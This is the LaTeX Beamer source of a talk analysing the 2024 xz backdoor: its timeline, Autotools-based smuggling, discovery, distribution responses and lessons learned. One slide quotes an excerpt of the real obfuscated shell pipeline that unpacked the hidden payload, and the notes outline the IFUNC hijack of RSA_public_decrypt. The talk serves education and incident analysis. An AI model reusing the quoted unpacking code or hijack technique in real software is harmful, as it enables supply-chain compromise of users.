summaryrefslogtreecommitdiff
path: root/incident-response-xz.tex
blob: 40ea47ccb92f3b52128377b01e2d439331ad77dd (about) (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
%% SPDX-License-Identifier: CC0-1.0
%%
%% Copyright (C) 2024 W. Kosior <koszko@koszko.org>
\documentclass{beamer}
\usetheme{Rochester}
\usecolortheme{seagull}
\usepackage{calc}
\usepackage{svg}
\usepackage{graphicx}
\usepackage[export]{adjustbox}
\usepackage{verbatimbox}
\usepackage{listings}
\usepackage{seqsplit}
\usepackage{soul}

\setbeamertemplate{navigation symbols}{}
%\setbeameroption{show notes}
\setbeameroption{show only notes}

\newenvironment{prettyitemize}{%
  \begin{itemize}
    \itemsep0.7em
}{%
  \end{itemize}
}

% \newcommand{\meme}[1]{%
%   \href{#1}{Meme \includesvg[height=\baselineskip]{Awesome.svg}}
% }

\newcommand{\memeframe}[2]{%
  \begin{frame}{#1 (Meme)}
    \begin{center}
      \Huge
      \meme{#2}
    \end{center}
  \end{frame}
}

\newcommand{\screenshotframe}[2]{%
  \begin{frame}{#1}
    \includegraphics[
      height=\dimexpr\textheight-0.5cm\relax,
      center
    ]{screenshots/#2}
  \end{frame}
}

\title{Incident response — 2024 xz backdoor}
\subtitle{
  Wojciech Kosior \& Krzysztof Ambroży
}
\begin{document}

\frame{
  \titlepage
  \begin{figure}[h]
    \includegraphics[height=0.25\textheight]{xz-logo.png}
  \end{figure}
}

\note{
  \begin{itemize}
  \item a popular free software package ``xz''
  \item we'll discuss
    \begin{itemize}
    \item how it happened
    \item briefly: how backdoor works
    \item how it was discorved \& analyzed
    \item various reactions, employed procedures
    \item discussions and triggered changes in projects (lessons learned)
    \end{itemize}
  \end{itemize}
}

\begin{frame}{Meet xz}
  \begin{prettyitemize}
  \item xz's what?
    \pause
  \item xz's who?
    \vspace{0.5em}
    \pause
    \begin{prettyitemize}
    \item
      {\raisebox{-2ex}{\includegraphics[height=\dimexpr\baselineskip*2\relax]{avatar-larhzu.png}}}
      Lasse Collin (\textit{Larhzu}) \pause
    \item
      {\raisebox{-2ex}{\includegraphics[height=\dimexpr\baselineskip*2\relax]{avatar-jia.png}}}
      Jia Cheong Tan (\textit{JiaT75})
    \end{prettyitemize}
  \end{prettyitemize}
  \pause
  \vspace{2em}
  % \begin{center}
  %   \meme{https://i0.wp.com/lex-img-p.s3.us-west-2.amazonaws.com/img/5ddde247-464a-4532-bfe4-5e0a1ed16062-RackMultipart20240407-179-1kxtsc.png?ssl=1}
  % \end{center}
\end{frame}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item ``xz'' — a (lossless) compression tool
        \begin{itemize}
        \item started in 2009
        \item includes both CLI application and library ``lzma'' (which was
          standalone before 2009)
        \item free/libre software (developed on GitHub, viewable by anyone)
        \item included by default in many operating systems (almost all
          GNU+Linux distros like Debian and Ubuntu)
        \end{itemize}
      \item xz is Lasse Collin
        \begin{itemize}
        \item Lasse has been the maintainer since the beginning in 2009
        \item Lasse got less involved with the project lately (personal
          problems)
        \item Lasse often had internet breaks (including when backdoor got
          placed)
        \end{itemize}
      \item xz is (was…) Jia Tan
        \begin{itemize}
        \item relatively new co-maintainer
        \item 2-2.5 years as a contributor
        \item 1.5 years with release rights
        \item DO NOT \textbf{YET} explain that backdor-activating code is absent
          in git nor that Jia is a fake identity
        \end{itemize}
      \end{itemize}
  \end{minipage}}
}

\begin{frame}{Timeline}
  \includesvg[
    width=\linewidth,
    inkscapelatex=false
  ]{timeline.svg}
\end{frame}

\note{
  \begin{itemize}
  \item before January 2022 — contributions to other projects
  \item April 2022 — certain "Jigar Kumar" and "Dennis Ens" start criticizing
    Lasse on the mailing list for not being able to take care of the project
    well; both appear to ba fake identities
  \item XZ Utils 5.6.1 got released to hide Valgrind errors manifesting
    because of the backdoor
  \item April 9 — Larhzu unbanned on GitHub, starts cleaning up the GitHub
    project
  \item maybe explain what tarball signing is
  \end{itemize}
}

\screenshotframe{Hit the news}{news-theregister.png}

\note{
  \begin{itemize}
  \item backdoor placed by Jia in 2024
  \item XZ versions 5.6.0 and 5.6.1
  \item discovered on march 29th
  \item became loud news (not just technical sites/blogs)
  \end{itemize}
}

\begin{frame}{Meet target audience}
  It's best to attack the most popular…

  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{target-audience-distros.svg}
    \end{figure}
  \end{center}
\end{frame}

\note{
  \begin{itemize}
  \item affected: GNU+Linux distros using systemd, based on APT or RPM
    \begin{itemize}
    \item Debian, Ubuntu, Kali
    \item Fedora, RedHat
    \item (Open)Suse,
    \item their other derivatives
    \end{itemize}
  \item unaffected (at this time…)
    \begin{itemize}
    \item Arch
    \item Gentoo
    \item Nix \& Guix
    \item Alpine
    \item non-Linux-based OS'es (BSD's, MacOS)
    \end{itemize}
  \end{itemize}
}

\begin{frame}{Meet targetted programs}
  \begin{prettyitemize}
  \item OpenSSH (SSH daemon)
    \pause
  \item systemd
    \pause
  \item glibc
  \end{prettyitemize}
\end{frame}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item OpenSSH (OpenBSD Secure Shell)
        \begin{itemize}
        \item used for remote management
        \item commonly deployed on UNIX servers
        \item daemon listens for connections on TCP (default port 22)
        \item typically handles logins and spawns a shell (like bash) on remote host
          (although other uses exist)
        \item typically has great privileges (session creation as different UNIX
          users)
        \item often receives attention (e.g. created sessions likely to be logged)
        \end{itemize}
      \item systemd
        \begin{itemize}
        \item an init system (the first program started by the kernel when
          computer boots)
        \item also a service management tool
        \item used on most mainstream GNU+Linux distros
        \item often criticized for bloat
        \end{itemize}
      \item glibc (GNU C Library)
        \begin{itemize}
        \item used on most mainstream GNU+Linux distros
        \item utilized by most of the programs on the system
        \item also often criticized for bloat
        \end{itemize}
      \end{itemize}
  \end{minipage}}
}

\begin{frame}{Autotools}
  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{autotools.svg}
    \end{figure}
  \end{center}
\end{frame}

\begin{myverbbox}{\vMakefile}Makefile\end{myverbbox}
\begin{myverbbox}{\vconfigureAc}configure.ac\end{myverbbox}
\begin{myverbbox}{\vMakefileAm}Makefile.am\end{myverbbox}
\begin{myverbbox}{\vconfigure}configure\end{myverbbox}
\begin{myverbbox}{\vMakefileIn}Makefile.in\end{myverbbox}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item GNU Autotools — Autoconf + Automake + some other programs
      \item used to configure how program should be built and to generate a
        {\vMakefile}
      \item steps:
        \begin{itemize}
        \item maintainer writes {\vconfigureAc} and {\vMakefileAm}
        \item maintainer uses a command from Autoconf to generate a
          {\vconfigure} script and a {\vMakefileIn}
        \item the project together with generated files is packed into a tarball
          and distributed
        \item user downloads the distribution tarball
        \item user runs the {\vconfigure} script to generate {\vMakefile}
        \item user runs Make to build the program
        \end{itemize}
      \item after downloading, user can optionally re-generate the {\vconfigure}
        and a {\vMakefileIn} files to avoid relying on upstream-generated ones
      \item common if user $\equiv$ a distro
      \item functionality often extended with custom M4 files
      \item they are often simply copied from other projects
      \end{itemize}
  \end{minipage}}
}

\begin{frame}{Autotools — Backdoor smuggling}
  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{autotools-and-backdoor.svg}
    \end{figure}
  \end{center}
\end{frame}

\begin{myverbbox}{\vBuildToHost}m4/build-to-host.m4\end{myverbbox}

\begin{myverbbox}{\vBadCorruptLzma}tests/files/bad-3-corrupt_lzma2.xz\end{myverbbox}

\begin{myverbbox}{\vGoodLargeCompressed}tests/files/good-large_compressed.lzma\end{myverbbox}

  \note{
    \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
        \begin{itemize}
        \item extra {\vBuildToHost} copied from the gnulib project and included
          in xz release tarballs
        \item modified to alter the build in a malicious way
        \item works even if the victim re-generates the {\vconfigure} file
        \item other malicious files (not shown) hidden among test resources
        \item programs have automated tests
        \item xz is a compression tool — tests involve decompression of archives
        \item {\vBuildToHost} extracts a hidden shell script from
          {\vBadCorruptLzma} (otherwise unused)
        \item extracted script further alters the build to link a binary payload
          into the program
        \item binary payload hidden in {\vGoodLargeCompressed} (also unused)
        \item {\vBuildToHost} not present \& backdoor inactive when building
          from git
        \end{itemize}
    \end{minipage}}
  }

\begin{frame}[fragile]{Backdoor unpacking}
  \ttfamily\small
  \begin{lstlisting}[breaklines]
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
if ! test -f liblzma_la-crc64-fast.o; then
exit 0
fi
cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
  \end{lstlisting}
\end{frame}

\note{
  \begin{itemize}
  \item only a small part of the script shown here, some extra line-breaks added
  \item the script
    \begin{itemize}
    \item checks the environment
    \item gets the payload linked into liblzma.so
    \item but only when using GCC, glibc, building an APT/RPM package, etc.
    \item but even when this is not met, looks for magic numbers in other files
      and tries to execute their embedded payloads if found (an entry for future
      backdoors)
    \end{itemize}
  \item explain what shared library is
  \item lots of obfuscation (as seen in the slide)
  \end{itemize}
}

\begin{myverbbox}{\vRSAPublicDecyrpt}RSA_public_decrypt\end{myverbbox}

\begin{frame}{Backdoor loading}
  \begin{itemize}
  \item many popular distros patch OpenSSH server to use systemd notifications
  \item systemd depends on lzma
  \item liblzma gets loaded into OpenSSH process and replaces function
    {\vRSAPublicDecyrpt} with its own implementation utilizing 'IFUNC' functionality of glibc
  % \item uses ``IFUNC''
  \end{itemize}
\end{frame}
% \begin{frame}{Backdoor loading}
\note{
  % \begin{itemize}
  % \item in many distros OpenSSH happens to be patched to use systemd
  %   notifications
  % \item systemd depends on lzma
  % \item liblzma gets loaded into OpenSSH process and replaces function
  %   {\vRSAPublicDecyrpt} with its own
  % \item uses ``IFUNC''
  % \end{itemize}

  % \vspace{1em}

  % \itshape
  ``The GNU indirect function support (IFUNC) is a feature of the GNU toolchain
  that allows a developer to create multiple implementations of a given function
  and to select amongst them at runtime using a resolver function which is also
  written by the developer. The resolver function is called by the dynamic
  loader during early startup to resolve which of the implementations will be
  used by the application.''
  \normalfont
% \end{frame}
}
\note{
  \begin{itemize}
  \item systemd depends on lzma
  \item liblzma gets loaded into OpenSSH process and replaces function
    {\vRSAPublicDecyrpt} with its own
  \item hijacking a function in another library not normally easy — global
    offset table and procedure linkage tables are made read-only after process
    is initialized
  \item IFUNCs abused to bypass the above and run code while said tables are
    still writable
  \end{itemize}
}

\begin{frame}{Backdoor exploiting}
  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{openssh-exploitation.svg}
    \end{figure}
  \end{center}
\end{frame}

\begin{myverbbox}{\vSystem}system()\end{myverbbox}

\note{
  \begin{itemize}
  \item upon SSH connection using certificate, backdoor checks for a specific
    key
  \item payload extracted from cert's public key before cert's sig verification
  \item theoretically, others could exploit this attack as well
  \item runs code using {\vSystem} function from C library (no extra SSH session
    spawned)
  \item again, lots of obfuscation
  \end{itemize}
}

\screenshotframe{Discovery}{andres-mastodon.png}

\note{
  \begin{itemize}
  \item Postgres developer, employed by Miscosoft
  \item had been working on Postgres using backdoored Debian Unstable
  \item noticed SSH running slower
  \item notified GNU+Linux distros
  \item one of the most famous programmers now
  \end{itemize}
}

% \memeframe{Discovery}{https://media.telefonicatech.com/telefonicatech/uploads/2024/4/downgrade-xz-meme.jpg}

\screenshotframe{Reactions — Debian}{reactions-dsa.png}

\note{
  \begin{itemize}
  \item Debian $\equiv$ primary distro user of APT
  \item Debian unstable and testing affected (i.e. releases not usually meant
    for production use)
  \item older xz release numbered with newer version for automatic revertion
    even with an ordinary update (the ``+really-5.4.5-1'' version suffix makes
    it lexicographically greater than the vulnerable package without suffix)
  \item users subscribing the security mailing list were notified on the day of
    discovery
  \end{itemize}
}

\screenshotframe{Reactions — Ubuntu}{reactions-ubuntu.png}

\note{
  \begin{itemize}
  \item the most popular Debian-derived distro
  \item maybe the most popular GNU+Linux distro overall
  \item only the not-yet-released Ubuntu 24.04 affected
  \item CVE recorded and library removed from repos on the day of backdoor
    discovery
  \end{itemize}
}

\screenshotframe{Reactions — Kali}{reactions-kali.png}

\note{
  \begin{itemize}
  \item one of few distros to have served the backdoored version to the general
    public rather than beta testers
  \item probably not the desired target of the attacker (Kali is not meant for
    servers)
  \item unlike OpenSUSE Tumbleweed, did not recommend affected users to
    reinstall the system despite the backdoor being truly active
  \end{itemize}
}

\screenshotframe{Reactions — Fedora}{reactions-fedora.png}

\begin{myverbbox}{\vDnfUpgradeAdvisory}sudo dnf upgrade --refresh \
--advisory=FEDORA-2024-d02c7bb266\end{myverbbox}

\note{
  \begin{itemize}
  \item Fedora $\equiv$ primary distro user of RPM, base for RedHat
  \item ``PLEASE IMMEDIATELY STOP USAGE OF ANY FEDORA RAWHIDE INSTANCES''
  \item only Fedora Linux 40 beta and Fedora Rawhide affected
  \item note: Rawhide is development/testing release, Fedora Linux 40 beta is a
    beta release; neither is meant for most kind of production tasks
  \item users nevertheless encouraged to downgrade to a version from before
    Jia'a xz maintainer access
  \item package version lowered but epoch bumped (maybe smarter than Debian's
    solution?)
  \item {\vDnfUpgradeAdvisory}
  \end{itemize}
}

\screenshotframe{Reactions — OpenSUSE}{reactions-opensuse.png}

\begin{myverbbox}{\vOpenSUSERevertto}5.6.1.revertto5.4\end{myverbbox}

\note{
  \begin{itemize}
  \item also an RPM user, base for commercial SUSE distro
  \item OpenSUSE Tumbleweed (rolling release variant of OpenSUSE) — one of the
    major affected distros (March 8 - March 28)
  \item users who had SSH exposed recommended to install afresh
  \item package created with version {\vOpenSUSERevertto}
  \end{itemize}
}

\screenshotframe{Reactions — Gentoo}{reactions-gentoo.png}

\note{
  \begin{itemize}
  \item reaction also on the same day
  \item distro not affected
  \item reverted to earlier xz release nevertheless
  \item users requested to downgrade nevertheless
  \item distro recently started linking lzma into packages by default which
    raised suspicion (but is clearle a coincidence)
  \item other unaffected distros (e.g. Arch) reacted similarly
  \end{itemize}
}

\screenshotframe{Reactions — Microsoft}{reactions-microsoft.png}

\note{
  While not know for involovement with GNU+Linux distros, Microsoft also has
  interest in them and wrote posts about the backdoor.
}

\screenshotframe{Reactions — Official Bodies}{reactions-cisa.png}

\note{
  \begin{itemize}
  \item CISA - Cybersecurity \& Infrastructure Security Agency
  \item a US agency
  \item gave similar advice as distro maintainers — to downgrade xz
  \end{itemize}
}

\screenshotframe{Lasse Collin's xz repo cleanup}{lasse-cleanup-commit.png}

\screenshotframe{New release without backdoor (2 weeks ago)}{new-release.png}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item Lasse unbanned on GitHub on April 2 (3 days after backdoor
        discovery)
      \item XZ repo cleaned up and reinstated on April 9
      \item Lasse has also been documenting the situation on
        \href{https://tukaani.org/xz-backdoor/}{https://tukaani.org/xz-backdoor/}
      \item good for Lasse, people got interested in xz, many compassionate with
        him and offered donations or other help
      \item Jia disappeared, it's been noticed he had been
        \begin{itemize}
        \item making commits on Chinese New Year which most Chinese don't
        \item spells his ``second name'' in a Singaporean rather than Chinese
          way
        \item using a Singaporean VPN for all communication
        \item using +0800 timezone for most of his commits but had also made
          some with +0300 timezone
        \item working on xz during typical working hours of the +0300 timezone
        \item but had also often worked on weekends
        \item inactive during some western holiday
        \end{itemize}
      \item Jia could be a fake Singaporean persona created and operated by the
        Russian or Iranian government
      \item but could as well be created and operated by a US agency in a way to
        suggest Russian involvement
      \end{itemize}
    \end{minipage}}
}

\begin{myverbbox}{\vLd}ld\end{myverbbox}
\begin{myverbbox}{\vObjdump}objdump\end{myverbbox}

\begin{frame}{Lessons Learned}
  \begin{prettyitemize}
  \item Decided to change their practices to mitigate attacks of this kind:
    \begin{prettyitemize}
    \item CMake (the other build system supported by xz)
    \item systemd (the init system rumoured to be bloated)
    \item groff (typesetting system using Autotools)
    \item GNU binutils (mainstream implementation of tools like {\vLd} and
      {\vObjdump})
    \item openSSH
    \end{prettyitemize}
  \item Had interesting discussions as a result of the attack: autoconf,
    automake, bug-gnulib, fedora-devel, debian-devel, oss-security
  \item Universal advice: put SSH behind VPN
  \end{prettyitemize}
\end{frame}

\note{
  \begin{itemize}
  \item CMake — check for feature tests made to be forcibly-failing (Jia made
    Linux landlock availability check fail by introducing syntax error in test C
    source)
  \item systemd — has already been working on reducing dependencies like xz
  \item groff — better practices: allow more files to be rebuilt by distribution
  \item GNU binutils — better practices: strip dependencies
  \item openSSH — look for solutions so that distros don't have to patch
    anything
  \end{itemize}

  Among others, supply chain hardening methods discussed.  Should we rely on vcs
  rather than on tarballs?  Should we create our tarballs in some more
  responsible way?
}

% \memeframe{Lessons Learned}{https://redlib.pussthecat.org/img/j8wcm4aajprc1.jpeg}

\begin{frame}{References}
  \small

  Resources used:
  \begin{prettyitemize}
  \item \href{https://tukaani.org/xz-backdoor/}{\ttfamily\seqsplit{https://tukaani.org/xz-backdoor/}}
  \item \href{https://www.openwall.com/lists/oss-security/2024/03/29/4}{\ttfamily\seqsplit{https://www.openwall.com/lists/oss-security/2024/03/29/4}}
  \item \href{https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27}{\ttfamily\seqsplit{https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27}}
  \item \href{https://www.theregister.com/2024/03/29/malicious_backdoor_xz/}{\ttfamily\seqsplit{https://www.theregister.com/2024/03/29/malicious\_backdoor\_xz/}}
  \item \href{https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b}{\ttfamily\seqsplit{https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b}}
  \end{prettyitemize}
\end{frame}

\begin{frame}{Credits}
  \begin{center}
    Thank you for your attention :)
  \end{center}

  \small

  \vspace{0.5em}

  And thanks to the graphics folks…
  \begin{prettyitemize}
  \item XZ logo — \st{Copyright (C) 2023 Jia Tan} made by haxxors behind the
    backdoor, distributed under the
    \href{https://creativecommons.org/licenses/by-sa/4.0/}{CC-BY-SA-4.0} license
  % \item Awesome ``emoji'' — by Openclipart user rones, uploaded 2011 (released
  %   into public domain with
  %   \href{https://creativecommons.org/publicdomain/zero/1.0/legalcode.en}{CC
  %     Zero v1.0})
  \item the original Autotools diagram — Copyright (C) 2001-2024 Gentoo Authors,
    distributed under the
    \href{https://creativecommons.org/licenses/by-sa/4.0/}{CC-BY-SA-4.0}
    license
  \item Virus image — by Openclipart user utrescu, uploaded 2012 (released into
    public domain with
    \href{https://creativecommons.org/publicdomain/zero/1.0/legalcode.en}{CC
      Zero v1.0})
  \end{prettyitemize}

  \vspace{0.5em}

  You can find this presentation sources here
  \begin{center}
    \href{https://git.koszko.org/AGH-xz-backdoor-presentation/}{https://git.koszko.org/AGH-xz-backdoor-presentation/}
  \end{center}
\end{frame}

\end{document}